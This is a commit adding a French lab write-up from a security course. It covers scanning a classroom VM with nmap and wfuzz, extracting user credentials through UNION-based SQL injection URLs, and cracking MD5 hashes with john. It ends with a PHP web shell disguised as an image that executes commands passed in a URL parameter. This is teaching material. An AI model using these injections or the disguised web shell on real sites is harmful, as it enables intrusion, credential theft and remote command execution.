First SQL injection TDM version

2019-02-22 00:20:05 +01:00 · 2019-02-22 00:20:05 +01:00 · 0f122ff54b
commit 0f122ff54b
parent 978e85d0cc
2 changed files with 181 additions and 0 deletions
--- a/content/securite/TDM_4-injection_SQL/files/TP4.pdf
+++ b/content/securite/TDM_4-injection_SQL/files/TP4.pdf
--- a/content/securite/TDM_4-injection_SQL/index.md
+++ b/content/securite/TDM_4-injection_SQL/index.md
@ -0,0 +1,181 @@
 ---
 title: "TDM : Injection SQL"
 date: 2019-02-21
 categories: ['Sécurité', 'TD machine']
 tags : ['wfuzz', 'site Internet', 'SQL', 'kali']
 ---
 Le but de ce TD est d'utiliser les injection SQL pour s'introduire dans un site
 Internet et d'utiliser celui-ci pour prendre le contrôle de la machine. Nous
 allons utiliser des logiciels comme [burp suite][l-burpsuite], [wfuzz][l-wfuzz]
 et [BeEf][l-beef].
 ## Trouver la machine à attaquer
 Avant de commences toute attaque, il faut trouver une victime. Comme pour le TDM
 sur les attaques réseau, nous allons utiliser `nmap`.  La machine à attaquer
 étant sur le même réseau que nous, commençons par trouver notre ip avec la
 commande suivante : 
 ```
 ip -4 a show dev wlan0 | grep inet | cut -d ' ' -f 6 
 172.16.8.234/24
 ```
 Il nous suffit maintenant de chercher une machine dans le réseau
 `172.16.8.0/24`:
 ```
 nmap -sS -p 80 --open 172.16.8.0/24
 [...]
 Nmap scan report for 172.16.8.189
 Host is up (0.0057s latency).
 PORT   STATE SERVICE
 80/tcp open  http
 MAC Address: XX:XX:XX:XX:XX:48 (Virtual Machine)
 [...]
 ```
 Nous avons repérer la machine à attaquer, mais ne nous arrêtons pas en si bon
 chemin, il est tout à fait possible d'en apprendre un peu plus avec `nmap -sC`
 pour peut-être découvrir quelque chose d'exploitable.
 ## Faire le tour du propriétaire
 Connectons nous maintenant sur le site avec notre navigateur et promenons nous
 sur le site. C'est un blog photo en PHP qui affiche des images de façon
 dynamique. En analysant le code source de la page
 ## trouver des URL "cachées"
 Il est probable que certaines parties du site soit cachées comme par exemple
 les pages d'administration. Utilisons [wfuzz][l-wfuzz], logiciel d'analyse de
 site par bruteforce.
 ```
 wfuzz -c -w /usr/share/wordlists/wfuzz/general/big.txt -p --hc 404 http://172.16.8.189/FUZZ
 ```
 ## Exfilter des données
 La page d'affichage des images semble être sensible à l'injection d'une requête
 SQL par la méthode HTTP GET (directement dans l'URL). La requête de sélection
 des photos semble être de la forme :
 ```SQL
 SELECT * FROM <t_photo> WHERE <t_photo>.id = id;
 ```
 L'URL de la page est alors `http://172.16.8.186/picture.php?picture=id`
 ### utiliser la clause UNION pour extraire des données
 La clause SQL `UNION` va nous permettre d'ajouter des informations extraites de
 la base par le biais de cette page mais attention : la seconde partie de la
 requête (après le `UNION`) devra comporter le même nombre de colonnes que la
 première.
 #### Utiliser ORDER BY pour trouver le nombre de colonnes
 Pour trouver ce fameux nombre de colonnes, nous allons utiliser la clause `ORDER
 BY` et procéder par dichotomie : classons les résultats en commençant par la
 colonne 10 L'URL est alors : 
 ```
 http://172.16.8.189/picture.php?picture=1' ORDER BY 10
 ```
 En cas d'erreur utilisons la colonne 5 sinon passons la 20 et ainsi
 de suite jusqu'à trouver le bon nombre.
 Dans le cadre du TP, le nombre de colonnes est **4**
 ### Trouver le schéma de la base de données
 Pour mener une action efficace, nous devons **en apprendre plus sur le schéma de
 cette base**. Dans chaque SGBDR, les information relative aux base sont stockée
 dans une table spécifique. Mysql / MariaDB étant le plus utilisé des SGBDR, nous
 allons tenter de rechercher dans ce sens : 
 ```SQL
 UNION SELECT 1,concat(table_name,";",column_name),1,1
 FROM information_schema.columns
 ```
 L'URL est alors : 
 ```
 http://172.16.8.189/picture.php?picture=1' SELECT 1,concat(table_name,":", [...]
 ```
 Bien vu, la page affiche maintenant les informations demandées, nous avons
 trouvé la table intéressante et ses champs :
 ```
 users.id
 users.login
 users.passwd
 ```
 ### Extraire les identifiants
 Nous avons maintenant toutes les cartes en main pour extraire les identifiants
 des comptes utilisateurs du site, la requête est alors :
 ```SQL
 UNION SELECT 1,concat(login,":",passwd),1,1
 FROM users
 ```
 Les identifiants récupérés seront sous la forme `user:pass`, il suffit de les
 enregistrer dans un fichier texte pour les passer ensuite à `john`.
 ## Casser les mots de passes.
 Les mots de passe récupérés vont être passé à `john` avec en paramètre une liste
 de mots de passe les plus connu. Il est aussi possible de soumettre directement
 des `hashes` des mots de passes à un moteur de recherche (Google par exemple).
 ```shell
 john -format=raw-MD5 --wordlist=biglist.txt extracted_pass.txt
 ```
 Dans le cadre du TDM, les deux mots de passes récupérés ont été trouvés dont
 celui du compte `admin`.
 ## Se connecter à la partie administration du site
 ## Uploader un fichier php
 Il est temps maintenant temps de créer un fichier php malveillant et de
 l'uploader sur le serveur. Le but pourrait être de masquer complètement notre
 script : s'il est appelé avec un paramètre il exécute le paramètre comme une
 commande, sinon il affiche une image déjà existante sur le serveur : 
 ```php
 <?php
 if ($_GET["c"]) {
 	$cmd = system($_GET["c"],$ret);
 	echo $cmd;
 }
 else {
 	$name = 'hackerman.jpeg';
 	$fp = fopen($name, 'rb');
 	// send the right headers
 	header("Content-Type: image/png");
 	header("Content-Length: " . filesize($name));
 	// dump the picture and stop the script
 	fpassthru($fp);
 	exit;
 }
 ?>
 ```
 [l-burpsuite]:https://portswigger.net/burp
 [l-wfuzz]:https://github.com/xmendez/wfuzz
 [l-BeEf]:https://beefproject.com/